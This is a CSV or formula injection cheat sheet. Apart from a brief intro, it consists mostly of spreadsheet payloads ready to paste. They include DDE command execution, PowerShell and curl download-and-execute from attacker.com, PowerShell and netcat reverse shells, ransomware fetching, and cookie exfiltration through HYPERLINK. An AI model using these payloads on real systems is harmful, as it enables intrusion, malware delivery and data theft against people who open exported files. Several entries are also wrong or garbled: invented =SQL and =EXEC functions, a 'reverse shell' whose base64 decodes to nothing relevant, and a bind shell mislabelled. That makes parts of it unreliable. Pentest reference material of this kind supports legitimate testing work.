CSV Injection

CSV Injection, also known as Formula Injection, occurs when a web application allows user-generated input to be exported into a CSV file without proper sanitization. Since spreadsheet programs like Excel, LibreOffice, and OpenOffice automatically interpret certain characters (e.g., =, +, -, or @) at the beginning of a cell as formulas, an attacker can inject malicious payloads into exported CSV files. When the victim opens the file, the injected formulas may execute arbitrary commands, exfiltrate data, or exploit vulnerabilities in the spreadsheet software. Proper mitigation involves escaping dangerous characters or prefixing them with a safe character like a single quote (') before export.

Working of CSV Injection

1. Command Execution: Injecting a formula like =CMD|' /C calc'!A0 that opens system applications, such as the calculator, by executing a command on the victim’s system.

2. Data Exfiltration: Using a formula like =HYPERLINK("http://malicious-site.com?cookie="&A1, "Click Here") to send sensitive data (e.g., session cookies) to a remote server.

3. Phishing with Redirect: Embedding a hyperlink in the CSV that redirects the victim to a malicious website, tricking them into visiting a phishing page.

4. Exploiting Spreadsheet Vulnerabilities: Injecting a formula like =EXEC('powershell -Command "Invoke-WebRequest..."') to execute arbitrary code on the victim's machine via spreadsheet software.

5. Spreadsheet Manipulation: Using formulas like =SUM(A1:A10) to alter or tamper with the displayed data in the CSV, misleading users or causing confusion.

Approach

CSV Injection, or Formula Injection, is a security flaw that arises when untrusted user input is incorporated into a CSV file. Formulas in a CSV can begin with the following characters

=
+
–
@

Basic Command Execution with DDE (Dynamic Data Exchange)

DDE (Dynamic Data Exchange) is a method used to execute commands on the system by sending messages between applications. In CSV injection, it allows for executing commands like launching system applications (e.g., Calculator).

 Spawn a Calculator (calc.exe):
     DDE("cmd";"/C calc";"!A0")

 Using `SUM` with Command Execution:
     @SUM(1+1)*cmd|' /C calc'!A0

 Arithmetic with Command Execution:
     =2+5+cmd|' /C calc'!A0

 Direct Command Execution in Cell Reference:
     =cmd|' /C calc'!'A1'

PowerShell Download and Execute

PowerShell can be used in CSV files to execute commands like downloading and executing malicious payloads from an attacker-controlled server.

Download and Execute a Malicious Shell:
     =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

 Download and Execute a PowerShell Script:
     =cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/payload.ps1")'!A0

  Reverse Shell via PowerShell:
     =cmd|'/C powershell IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aW5zdGFsbC1tYXRjaGVyLmV4ZWM=")))'!A0

Prefix Obfuscation and Command Chaining

Prefix obfuscation involves adding extra characters or commands to confuse detection systems, while command chaining allows the execution of multiple commands simultaneously or sequentially.

Obfuscating the Command with Prefixes:
     =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A

Command Chaining with Multiple Executions:
     =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A

 Simplified Command Execution:
     =         cmd|'/c calc.exe'!A

Using rundll32 Instead of cmd

rundll32 is a Windows utility that runs DLL files. In CSV injection, it can be used to execute commands or launch programs via system DLLs.

Using `rundll32` to Execute Programs:
     =rundll32|'URL.dll,OpenURL calc.exe'!A

Obfuscation with `rundll32`:
     =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A

Running a program from `rundll32`:
     =rundll32 | 'C:\Windows\System32\cmd.exe' | '/C calc.exe'!A

Using Null Characters to Bypass Filters

Null characters (0x00) are often ignored by servers or applications when processing strings. In CSV injection, they can be used to bypass security filters by splitting payloads or commands.

Null Character Injection for Filter Bypass:
     =    C    m D                    |        '/        c       c  al  c      .  e                  x       e  '   !   A

Using null characters to evade command-blocking filters:
     =cmd|' /C echo 0x00 calc.exe'!'A0'

File Download and Execution via PowerShell

PowerShell’s ability to download and execute files from a remote server allows attackers to inject and execute malware or scripts via CSV.

Download and Execute Remote Files:
     =cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString("http://malicious.com/shell.ps1")'!A0

Download and execute an executable:
     =cmd|'/C powershell (New-Object Net.WebClient).DownloadFile("http://malicious.com/malware.exe", "C:\malware.exe")'!A0

Browser Redirection via Hyperlinks

Hyperlink injection in CSV files can redirect users to malicious or phishing websites, potentially compromising credentials or infecting their system.

Phishing Redirect to Malicious Site:
=HYPERLINK("http://malicious-site.com/login", "Click Here to Log In")

Automatic Redirection:
=HYPERLINK("http://attacker.com", "Click to Visit")

Web Shell Execution

Web shells are scripts that allow attackers to remotely control a victim’s server or system. They can be executed via PowerShell or DDE in CSV files.

Execute Web Shell on Server:
     =cmd|'/C powershell IEX("IWR http://attacker.com/shell.ps1")'!A0

Upload and Execute a Web Shell:
     =cmd|'/C powershell IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/shell.ps1")'!'A0'

SQL Injection via CSV

SQL injection allows attackers to inject malicious SQL queries into the backend database. Affected systems may execute arbitrary queries that can alter or retrieve sensitive information.

Attempt SQL Injection:
=SQL('SELECT * FROM users WHERE username="admin" AND password="password";') 

Blind SQL Injection:
=SQL('SELECT username FROM users WHERE id=1 OR 1=1;') 

Bypassing Filters with Base64 Encoding

Base64 encoding transforms data into an ASCII string format. This technique is used to evade filters that block suspicious keywords or commands.

Using Base64 Encoding to Avoid Detection:
     =cmd|'/C powershell IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aW5zdGFsbC1tYXRjaGVyLmV4ZWM=")))'!A0

Decoding and Executing Base64 Payload:
     =cmd|'/C powershell IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aW5zdGFsbC1tYXRjaGVyLmV4ZWM=")))'!'A0'

Cross-Site Scripting (XSS) in Excel

XSS in Excel can be used to execute malicious JavaScript when a user interacts with a hyperlink or embedded script.

Inject XSS Payload in CSV:
     =HYPERLINK("javascript:alert('XSS')", "Click Here")

JavaScript Execution Triggered via Hyperlink:
     =HYPERLINK("javascript:eval('alert(document.cookie)')", "Click Here")

PowerShell Reverse Shell

A reverse shell connects a victim’s machine to an attacker's system, allowing remote command execution and full control over the target system.

Launch PowerShell Reverse Shell to Attacker:
     =cmd|'/C powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/reverse-shell.ps1')"'!A0

PowerShell Reverse Shell with Netcat:
     =cmd|"/C powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length)}; $client.Close()\""!'A0'

Command Injection with Curl

Command injection with curl downloads a file or executes a script from a remote server, potentially leading to remote code execution.

Inject Command to Download and Execute a File via Curl:
     =cmd|"/C curl http://malicious-site.com/malware.exe -o C:\malware.exe && start C:\malware.exe"!'A0'

Use `curl` to execute a remote script:
     =cmd|"/C curl http://attacker.com/malicious.sh | bash"!'A0'

Reverse Shell via Netcat

Netcat (nc) is a versatile networking tool. It can be used to establish a reverse shell by connecting to a remote server on a specific port.

Using Netcat to Establish a Reverse Shell:
     =cmd|"/C nc -e cmd.exe attacker.com 4444"!'A0'

Establish a Reverse Shell via Netcat:
     =cmd|"/C nc -lvp 4444 -e cmd.exe"!'A0'

Modify File Content via PowerShell

PowerShell can be used to change files on the victim's system, potentially overwriting important data or injecting malicious content.

Overwrite File Content with Malicious Data:
     =cmd|'/C powershell Set-Content "C:\Users\Victim\Desktop\important_file.txt" "Malicious Content"'!'A0'

Modify a Configuration File:
     =cmd|'/C powershell Add-Content "C:\Windows\System32\config.sys" "Malicious Data"'!'A0'

Send Email via PowerShell

PowerShell can be used to send emails directly from the victim's machine. This can be used for phishing campaigns or spreading malware.

Send Malicious Email from Victim’s Machine:
     =cmd|'/C powershell $smtp = New-Object Net.Mail.SmtpClient("smtp.attacker.com"); $msg = New-Object Net.Mail.MailMessage("[email protected]", "[email protected]", "Subject", "Malicious Content"); $smtp.Send($msg)'!'A0'

Ransomware Execution

Downloading and executing ransomware on a victim’s machine locks files or demands payment in exchange for decrypting them.

Launch Ransomware Script via PowerShell:
     =cmd|'/C powershell IEX (New-Object Net.WebClient).DownloadString("http://attacker.com/ransomware.ps1")'!'A0'

Execute Ransomware via PowerShell:
     =cmd|'/C powershell IEX (New-Object Net.WebClient).DownloadFile("http://attacker.com/ransomware.exe", "C:\ransomware.exe") && start C:\ransomware.exe'!'A0'

Privilege Escalation via PowerShell

Privilege escalation involves gaining higher access levels, typically by exploiting vulnerabilities or executing system commands via PowerShell.

Escalate Privileges via PowerShell:
     =cmd|'/C powershell Start-Process powershell -Verb runAs'!'A0'

Launch System Apps with File Paths

Executes applications or scripts on the victim’s machine using absolute file paths to bypass some forms of security.

Execute a Windows System App (e.g., Notepad):
     =cmd|'/C start notepad.exe'!'A0'

Launch Control Panel:
     =cmd|'/C start control.exe'!'A0'

Infecting with JavaScript Payloads

Injects JavaScript into the CSV file, which gets executed when the document is opened, leading to potential XSS attacks or other malicious actions.

Inject JavaScript into Excel:
     =HYPERLINK("javascript:eval('alert(1)')", "Click to Run JavaScript")

Execute Malicious JavaScript:
     =HYPERLINK("javascript:eval('document.location=\'http://attacker.com\';')", "Click to Redirect")

Google Sheets

Google Sheets allows some additionnal formulas that are able to fetch remote URLs

• IMPORTXML(url, xpath_query, locale)
• IMPORTRANGE(spreadsheet_url, range_string)
• IMPORTHTML(url, query, index)
• IMPORTFEED(url, [query], [headers], [num_items])
• IMPORTDATA(url)

So one can test blind formula injection or a potential for data exfiltration with

=IMPORTXML("http://burp.collaborator.net/csv", "//a/@href")

Writeups

• CSV Excel Macro Injection

• CSV Excel formula injection

• CSV Injection – A Guide To Protecting CSV Files

• From CSV to Meterpreter

• The Absurdly Underestimated Dangers of CSV Injection

• Three New DDE Obfuscation Methods - ReversingLabs

• Your Excel Sheets Are Not Safe! Here's How to Beat CSV Injection

• Reference